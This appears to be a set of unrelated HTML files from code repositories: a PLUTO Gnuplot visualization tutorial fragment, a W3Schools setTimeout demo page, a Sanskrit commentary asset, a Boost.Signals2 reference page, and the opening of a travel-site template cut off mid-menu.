<div align=justify><font face="Verdana">In this example, we skip by 200x200 (grid size) x 8 (bytes for double precision) x 2 (since vy is stored after density and x-velocity) bytes. The sequential order of variables can be deduced from the corresponding </font><font face="Courier"><B>dbl.out</B></font><font face="Verdana"> file.</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=79><div class="wpmd">
<div align=justify><font face="Verdana" class="ws12"><B><U>Including grid information using predefined scripts & macros</U></B></font></div>
<div align=justify><font face="Verdana" class="ws12"><U><BR></U></font></div>
<div align=justify><font face="Verdana">In the previous examples, the axis are scaled down to the number of points rather than to the actual coordinates since grid information is not included in PLUTO binary files but it is stored seprately (grid.out). For uniform grid spacing this problem can be fixed by taking advantage of the scripts provided with the PLUTO distribution under the </font><font face="Courier"><B>Tools/Gnuplot</B></font><font face="Verdana"> directory. To this end, you need to define the </font><font face="Courier"><B>GNUPLOT_LIB</B></font><font face="Verdana"> environment variable (in your shell) which will be appended to the loadpath of Gnuplot:</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font face="Courier">> export GNUPLOT_LIB=$PLUTO_DIR/Tools/Gnuplot # use setenv for tcsh users</font></div>
<div align=justify><font face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">Alternatively, you can also change the loadpath directly from Gnuplot:</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> set loadpath '<pluto_full_path>/Tools/Gnuplot'</font></div>
<div align=justify><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">You can then start a Gnuplot session as follows:</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> load "grid.gp" # read and store grid information</font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> dsize=8; load "macros.gp" # set the display </font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> load "pm3D_setting.gp" # set display canvas for pm3d plot style</font></div>
<div align=justify><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">The first line invokes the </font><font face="Courier"><B>grid.gp</B></font><font face="Verdana"> script that reads </font><font face="Courier"><B>grid.out</B></font><font face="Verdana"> and initializes variables such as grid spacing (</font><font face="Courier"><B>dx, dy</B></font><font face="Verdana">), domain range (</font><font face="Courier"><B>xb,xe</B></font><font face="Verdana"> and </font><font face="Courier"><B>yb,ye</B></font><font face="Verdana">) and length (</font><font face="Courier"><B>Lx=xe-xb, </B></font><font face="Verdana"> and </font><font face="Courier"><B>Ly=ye-yb</B></font><font face="Verdana">), number of points (</font><font face="Courier"><B>nx,ny</B></font><font face="Verdana">). </font></div>
<div align=justify><font face="Verdana">The second line sets the data size (</font><font face="Courier"><B>dsize=8</B></font><font face="Verdana"> or </font><font face="Courier"><B>dsize=4</B></font><font face="Verdana"> for double or single prcision) and then initializes some convenient macros (</font><font face="Courier"><B>@BINARR, @XSLICE</B></font><font face="Verdana"> and </font><font face="Courier"><B>@YSLICE</B></font><font face="Verdana">) used to pass command line options embedding grid and data-format specifications to </font><font color="#0000FF" face="Courier"><B>splot</B></font><font face="Verdana"> and </font><font color="#0000FF" face="Courier"><B>plot</B></font><font face="Verdana">. </font></div>
<div align=justify><font face="Verdana">The third script, </font><font face="Courier"><B>pm3D_setting.gp</B></font><font face="Verdana">, sets a default environment for viewing binary data files using the </font><font face="Courier"><B>pm3d</B></font><font face="Verdana"> style of Gnuplot. </font></div>
<div align=justify><font face="Verdana">You may also call all of them at once using </font><font color="#0000FF" face="Courier"><B>load "pluto.gp"</B></font><font face="Verdana">.</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font face="Verdana">Using these macros makes it a lot easier to replace the previous 2D plots of the y-velocity with</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> splot "vx2.0010.dbl" @BINARR</font></div>
<div align=justify><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">or, in the case of a single data file, with</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> nvar = 2; splot "data.0010.dbl" @BINARR</font></div>
<div align=justify><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">Here </font><font face="Courier"><B>nvar</B></font><font face="Verdana"> is used to select the variable to be plotted out of a single data set but must be 0 for multiple data files. </font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font face="Verdana">In the following we provide three visualization examples on the relativistic magnetized jet with toroidal magnetic field (conf # 01 in </font><font face="Courier"><B>Test_Problems/RMHD/Toroidal_Jet/</B></font><font face="Verdana">, 200x420 zones).</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<UL>
<li><font face="Verdana"><U>Example #1</U></font><font face="Verdana">. Display density (in log scale) for the last </font><font face="Courier"><B>.dbl</B></font><font face="Verdana"> output in </font></li>
</UL>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> load "pluto.gp"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set term window 0 </font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set term window size 600,860 # set window size</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set log cb # set log scale</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set title "Log(density)"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set xlabel "r"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set ylabel "z"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> nvar=0; splot "data.0001.dbl" @BINARR </font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=center><IMG border=0 width=449 height=587 src="images/rmhd_jet_pm3d_rho.PNG"></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=194><div class="wpmd">
<UL>
<li style="margin-left: 0"><font face="Verdana"><U>Example #2</U></font><font face="Verdana">. Add a second window displaying a zoom-in of the longitudinal velocity in the region 0 < x < 4, 16.5 < y < 20.5 using a green colormap:</font></li>
</UL>
<div align=justify style="margin-left:40px;"><font face="Verdana"><BR></font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set palette defined (0 'black', 1 'web-green', 2 'white')</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set term window 1 # set new window</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set term window size 640,640 # set size</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> unset log cb</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set bmargin at screen 0.15 # adjust bottom margin</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set title " "</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> nvar=2; splot [0:4] [16.5:20.5] "data.0001.dbl" @BINARR</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=263><div class="wpmd">
<div align=center><IMG border=0 width=456 height=411 src="images/rmhd_jet_pm3d_vz.PNG"></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<UL>
<li><font face="Verdana"><U>Example #3</U></font><font face="Verdana">: </font><font face="Verdana"><B>(Downsampling of large data sets)</B></font><font face="Verdana">: visualization of large datasets can become quite slow as the resolution increases. In this case a sensible speedup can be obtained by downsampling the binary file by a factor integer of the original grid using the every keyword,</font></li>
</UL>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> </font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> splot "data.0001.dbl" @BINARR every 4:4</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana"> will downsample the data by a factor of 4</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<UL>
<li><font face="Verdana"><U>Example #4</U></font><font face="Verdana">: </font><font face="Verdana"><B>(Slicing)</B></font><font face="Verdana"> In this example we show how to plot 1D profiles along a given row or column with the </font><font face="Courier"><B>@XSLICE</B></font><font face="Terminal"> </font><font face="Verdana">or </font><font face="Courier"><B>@YSLICE</B></font><font face="Verdana"> macros. Using these macro requires setting the constant slice indices </font><font face="Courier"><B>0 <= jcut <= ny-1</B></font><font face="Verdana"> and </font><font face="Courier"><B>0 <= icut <= nx-1</B></font><font face="Verdana"> before using the macros. The following set of instruction is used to produce a profile plot of the pressure along the jet axis at </font><font face="Courier"><B>r = r[0]</B></font><font face="Verdana">:</font></li>
</UL>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> unset pm3d</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set term window 2</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set title "Pressure profile along axis"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set tmargin at screen 0.85</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set xlabel "z"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set ylabel "p"</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> set log y</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier">gnuplot> nvar = 7; icut=0; plot "data.0001.dbl" @YSLICE</font></div>
<div align=justify style="margin-left:40px;"><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=center><IMG border=0 width=699 height=350 src="images/rmhd_jet_pm3d_prs_yslice.PNG"></div>
</div>
</TD>
</TR>
</TABLE>
</div>
</div></div>
<div id="text1" style="position:absolute; overflow:hidden; left:15px; top:15px; width:506px; height:38px; z-index:1">
<div class="wpmd">
<div><font face="Verdana" class="ws18">Data Visualization with Gnuplot</font></div>
</div></div>
<div id="hr1" style="position:absolute; overflow:hidden; left:15px; top:45px; width:771px; height:17px; z-index:2">
<hr size=2 width=771 color="#3366FF">
</div>
</body>
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit30fb.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_win_settimeout_param by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:28:06 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryjs");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<body>
<p>Click the Start button to output "Hello" after 2 seconds.</p>
<p>In this example, we also output the parameters that were passed to the alertFunc() function (does not work in IE9 and earlier).</p>
<button onclick="myStartFunction()">Start</button>
<p id="demo"></p>
<p id="demo2" style="color:red;"></p>
<script>
var myVar;
function myStartFunction() {
myVar = setTimeout(alertFunc, 2000, "First parameter", "Second parameter");
}
function alertFunc(param1, param2) {
document.getElementById("demo").innerHTML += "Hello ";
document.getElementById("demo2").innerHTML = "Parameters passed to alertFunc(): <br>"
+ param1 + "<br>" + param2 + "<br>";
}
</script>
</body>
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_win_settimeout_param by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:28:06 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/jsref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjsref_win_settimeout_param.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
app/src/main/assets/html/sa/MD_C03_S02_1.html | SrirangaDigital/shankara-android | <html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="assets/stylesheet-sa.css" />
</head>
<body>
<div class='authorline'>इति तृतीयमुण्डके द्वितीयखण्डभाष्यम् ॥ </div></body>
</html>
|
myodd/boost/doc/html/boost/signals2/signal_base.html | FFMG/myoddweb.piger | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Class signal_base</title>
<link rel="stylesheet" href="../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset">
<link rel="up" href="../../signals2/reference.html#header.boost.signals2.signal_base_hpp" title="Header <boost/signals2/signal_base.hpp>">
<link rel="prev" href="signal/arg.html" title="Class template arg">
<link rel="next" href="keywords/signature_type.html" title="Class template signature_type">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../boost.png"></td>
<td align="center"><a href="../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="signal/arg.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../signals2/reference.html#header.boost.signals2.signal_base_hpp"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="keywords/signature_type.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="refentry">
<a name="boost.signals2.signal_base"></a><div class="titlepage"></div>
<div class="refnamediv">
<h2><span class="refentrytitle">Class signal_base</span></h2>
<p>boost::signals2::signal_base — Base class for signals.</p>
</div>
<h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2>
<div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: <<a class="link" href="../../signals2/reference.html#header.boost.signals2.signal_base_hpp" title="Header <boost/signals2/signal_base.hpp>">boost/signals2/signal_base.hpp</a>>
</span>
<span class="keyword">class</span> <a class="link" href="signal_base.html" title="Class signal_base">signal_base</a> <span class="special">:</span> <span class="keyword">public</span> noncopyable <span class="special">{</span>
<span class="keyword">public</span><span class="special">:</span>
<span class="comment">// <a class="link" href="signal_base.html#boost.signals2.signal_baseconstruct-copy-destruct">construct/copy/destruct</a></span>
<span class="keyword">virtual</span> <a class="link" href="signal_base.html#idm45443338122816-bb"><span class="special">~</span><span class="identifier">signal_base</span></a><span class="special">(</span><span class="special">)</span><span class="special">;</span>
<span class="special">}</span><span class="special">;</span></pre></div>
<div class="refsect1">
<a name="idm45946340333632"></a><h2>Description</h2>
<div class="refsect2">
<a name="idm45946340333216"></a><h3>
<a name="boost.signals2.signal_baseconstruct-copy-destruct"></a><code class="computeroutput">signal_base</code>
public
construct/copy/destruct</h3>
<div class="orderedlist"><ol class="orderedlist" type="1"><li class="listitem">
<pre class="literallayout"><span class="keyword">virtual</span> <a name="idm45443338122816-bb"></a><span class="special">~</span><span class="identifier">signal_base</span><span class="special">(</span><span class="special">)</span><span class="special">;</span></pre>
<p>Virtual destructor.</p>
</li></ol></div>
</div>
</div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2001-2004 Douglas Gregor<br>Copyright © 2007-2009 Frank Mori Hess<p>Distributed under the Boost
Software License, Version 1.0. (See accompanying file
<code class="filename">LICENSE_1_0.txt</code> or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="signal/arg.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../signals2/reference.html#header.boost.signals2.signal_base_hpp"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="keywords/signature_type.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
html/homepage4.html | despotCymatics/sun_travel | <!DOCTYPE html>
<!--[if IE 8]> <html class="ie ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie ie9"> <![endif]-->
<!--[if gt IE 9]><!--> <html> <!--<![endif]-->
<head>
<!-- Page Title -->
<title>Travelo | Responsive HTML5 Travel Template</title>
<!-- Meta Tags -->
<meta charset="utf-8">
<meta name="keywords" content="HTML5 Template" />
<meta name="description" content="Travelo | Responsive HTML5 Travel Template">
<meta name="author" content="SoapTheme">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Theme Styles -->
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/font-awesome.min.css">
<link href='http://fonts.googleapis.com/css?family=Lato:300,400,700' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="css/animate.min.css">
<!-- Current Page Styles -->
<link rel="stylesheet" type="text/css" href="components/revolution_slider/css/settings.css" media="screen" />
<link rel="stylesheet" type="text/css" href="components/revolution_slider/css/style.css" media="screen" />
<link rel="stylesheet" type="text/css" href="components/jquery.bxslider/jquery.bxslider.css" media="screen" />
<link rel="stylesheet" type="text/css" href="components/flexslider/flexslider.css" media="screen" />
<!-- Main Style -->
<link id="main-style" rel="stylesheet" href="css/style.css">
<!-- Custom Styles -->
<link rel="stylesheet" href="css/custom.css">
<!-- Updated Styles -->
<link rel="stylesheet" href="css/updates.css">
<!-- Responsive Styles -->
<link rel="stylesheet" href="css/responsive.css">
<!-- CSS for IE -->
<!--[if lte IE 9]>
<link rel="stylesheet" type="text/css" href="css/ie.css" />
<![endif]-->
<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script type='text/javascript' src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<script type='text/javascript' src="http://cdnjs.cloudflare.com/ajax/libs/respond.js/1.4.2/respond.js"></script>
<![endif]-->
</head>
<body>
<div id="page-wrapper">
<header id="header" class="navbar-static-top">
<div class="topnav hidden-xs">
<div class="container">
<ul class="quick-menu pull-left">
<li><a href="#">MY ACCOUNT</a></li>
<li class="ribbon">
<a href="#">English</a>
<ul class="menu mini">
<li><a href="#" title="Dansk">Dansk</a></li>
<li><a href="#" title="Deutsch">Deutsch</a></li>
<li class="active"><a href="#" title="English">English</a></li>
<li><a href="#" title="Español">Español</a></li>
<li><a href="#" title="Français">Français</a></li>
<li><a href="#" title="Italiano">Italiano</a></li>
<li><a href="#" title="Magyar">Magyar</a></li>
<li><a href="#" title="Nederlands">Nederlands</a></li>
<li><a href="#" title="Norsk">Norsk</a></li>
<li><a href="#" title="Polski">Polski</a></li>
<li><a href="#" title="Português">Português</a></li>
<li><a href="#" title="Suomi">Suomi</a></li>
<li><a href="#" title="Svenska">Svenska</a></li>
</ul>
</li>
</ul>
<ul class="quick-menu pull-right">
<li><a href="#travelo-login" class="soap-popupbox">LOGIN</a></li>
<li><a href="#travelo-signup" class="soap-popupbox">SIGNUP</a></li>
<li class="ribbon currency">
<a href="#" title="">USD</a>
<ul class="menu mini">
<li><a href="#" title="AUD">AUD</a></li>
<li><a href="#" title="BRL">BRL</a></li>
<li class="active"><a href="#" title="USD">USD</a></li>
<li><a href="#" title="CAD">CAD</a></li>
<li><a href="#" title="CHF">CHF</a></li>
<li><a href="#" title="CNY">CNY</a></li>
<li><a href="#" title="CZK">CZK</a></li>
<li><a href="#" title="DKK">DKK</a></li>
<li><a href="#" title="EUR">EUR</a></li>
<li><a href="#" title="GBP">GBP</a></li>
<li><a href="#" title="HKD">HKD</a></li>
<li><a href="#" title="HUF">HUF</a></li>
<li><a href="#" title="IDR">IDR</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div class="main-header">
<a href="#mobile-menu-01" data-toggle="collapse" class="mobile-menu-toggle">
Mobile Menu Toggle
</a>
<div class="container">
<h1 class="logo navbar-brand">
<a href="index.html" title="Travelo - home">
<img src="images/logo.png" alt="Travelo HTML5 Template" />
</a>
</h1>
<nav id="main-menu" role="navigation">
<ul class="menu">
<li class="menu-item-has-children">
<a href="index.html">Home</a>
<ul>
<li><a href="index.html">Home Layout 1</a></li>
<li><a href="homepage2.html">Home Layout 2</a></li>
<li><a href="homepage3.html">Home Layout 3</a></li>
<li><a href="homepage4.html">Home Layout 4</a></li>
<li><a href="homepage5.html">Home Layout 5</a></li>
<li><a href="homepage6.html">Home Layout 6</a></li>
<li><a href="homepage7.html">Home Layout 7</a></li>
<li><a href="homepage8.html">Home Layout 8</a></li>
<li><a href="homepage9.html">Home Layout 9</a></li>
<li><a href="homepage10.html">Home Layout 10</a></li>
<li><a href="homepage11.html">Home Layout 11</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="hotel-index.html">Hotels</a>
<ul>
<li><a href="hotel-index.html">Home Hotels</a></li>
<li><a href="hotel-list-view.html">List View</a></li>
<li><a href="hotel-grid-view.html">Grid View</a></li>
<li><a href="hotel-block-view.html">Block View</a></li>
<li><a href="hotel-detailed.html">Detailed</a></li>
<li><a href="hotel-booking.html">Booking</a></li>
<li><a href="hotel-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="flight-index.html">Flights</a>
<ul>
<li><a href="flight-index.html">Home Flights</a></li>
<li><a href="flight-list-view.html">List View</a></li>
<li><a href="flight-grid-view.html">Grid View</a></li>
<li><a href="flight-block-view.html">Block View</a></li>
<li><a href="flight-detailed.html">Detailed</a></li>
<li><a href="flight-booking.html">Booking</a></li>
<li><a href="flight-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="car-index.html">Cars</a>
<ul>
<li><a href="car-index.html">Home Cars</a></li>
<li><a href="car-list-view.html">List View</a></li>
<li><a href="car-grid-view.html">Grid View</a></li>
<li><a href="car-block-view.html">Block View</a></li>
<li><a href="car-detailed.html">Detailed</a></li>
<li><a href="car-booking.html">Booking</a></li>
<li><a href="car-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="cruise-index.html">Cruises</a>
<ul>
<li><a href="cruise-index.html">Home Cruises</a></li>
<li><a href="cruise-list-view.html">List View</a></li>
<li><a href="cruise-grid-view.html">Grid View</a></li>
<li><a href="cruise-block-view.html">Block View</a></li>
<li><a href="cruise-detailed.html">Detailed</a></li>
<li><a href="cruise-booking.html">Booking</a></li>
<li><a href="cruise-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="tour-index.html">Tour</a>
<ul>
<li><a href="tour-index.html">Home Tour</a></li>
<li><a href="tour-fancy-package-2column.html">Fancy Packages 2 Column</a></li>
<li><a href="tour-fancy-package-3column.html">Fancy Packages 3 Column</a></li>
<li><a href="tour-fancy-package-4column.html">Fancy Packages 4 Column</a></li>
<li><a href="tour-simple-package-2column.html">Simple Packages 2 Column</a></li>
<li><a href="tour-simple-package-3column.html">Simple Packages 3 Column</a></li>
<li><a href="tour-simple-package-4column.html">Simple Packages 4 Column</a></li>
<li><a href="tour-simple-package-3column.html">Location - Eruope</a></li>
<li><a href="tour-simple-package-4column.html">Location - North America</a></li>
<li><a href="tour-detailed1.html">Detailed 1</a></li>
<li><a href="tour-detailed2.html">Detailed 2</a></li>
<li><a href="tour-booking.html">Booking</a></li>
</ul>
</li>
<li class="menu-item-has-children megamenu-menu">
<a href="#">Pages</a>
<div class="megamenu-wrapper container" data-items-per-column="8">
<div class="megamenu-holder">
<ul class="megamenu">
<li class="menu-item-has-children">
<a href="#">Standard Pages</a>
<ul class="clearfix">
<li><a href="pages-aboutus1.html">About Us 1</a></li>
<li><a href="pages-aboutus2.html">About Us 2</a></li>
<li><a href="pages-services1.html">Services 1</a></li>
<li><a href="pages-services2.html">Services 2</a></li>
<li><a href="pages-photogallery-4column.html">Gallery 4 Column</a></li>
<li><a href="pages-photogallery-3column.html">Gallery 3 Column</a></li>
<li><a href="pages-photogallery-2column.html">Gallery 2 Column</a></li>
<li><a href="pages-photogallery-fullview.html">Gallery Read</a></li>
<li><a href="pages-blog-rightsidebar.html">Blog Right Sidebar</a></li>
<li><a href="pages-blog-leftsidebar.html">Blog Left Sidebar</a></li>
<li><a href="pages-blog-fullwidth.html">Blog Full Width</a></li>
<li><a href="pages-blog-read.html">Blog Read</a></li>
<li><a href="pages-faq1.html">Faq 1</a></li>
<li><a href="pages-faq2.html">Faq 2</a></li>
<li><a href="pages-layouts-leftsidebar.html">Layouts Left Sidebar</a></li>
<li><a href="pages-layouts-rightsidebar.html">Layouts Right Sidebar</a></li>
<li><a href="pages-layouts-twosidebar.html">Layouts Two Sidebar</a></li>
<li><a href="pages-layouts-fullwidth.html">Layouts Full Width</a></li>
<li><a href="pages-contactus1.html">Contact Us 1</a></li>
<li><a href="pages-contactus2.html">Contact Us 2</a></li>
